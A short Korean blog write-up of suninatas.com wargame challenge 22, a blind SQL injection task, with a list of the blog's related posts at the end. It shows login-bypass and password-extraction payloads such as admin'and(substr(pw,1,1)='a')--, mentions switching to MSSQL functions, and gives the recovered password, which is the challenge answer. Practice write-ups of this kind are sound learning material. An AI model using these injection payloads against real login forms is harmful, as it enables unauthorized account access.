22번 문제에요.
배점은 332점, 분야는 웹이에요.
BSQLI를 하래요.
그리고 친절하게 필터링되는 키워드까지 적어주네요.
암튼 admin'-- / a 를 넣어보면?
OK admin
admin / a 를 넣어보면?
False
그러니 길이 구문은 admin'and(length(pw)=1)-- 로.
값 구문은 admin'and(substr(pw,1,1)='a')-- 로 해서
돌려보면?
????
DB 환경이 MYSQL이 아닌가보네요.
mssql 식으로
len 과 substring 를 써서 해보면?
END - "N1c3Bilnl)"
저걸 넣어보면?
빠밤!
로그인이 되네요.
키는 저 비밀번호에요.
'연구글 > suninatas.com' 카테고리의 다른 글
| suninatas 24 / system (0) | 2020.12.09 |
|---|---|
| suninatas 23 / web (0) | 2020.12.07 |
| suninatas 21 / forensics (0) | 2020.12.03 |
| suninatas 19 / forensics (0) | 2020.08.27 |
| suninatas 18 / forensics (0) | 2020.08.27 |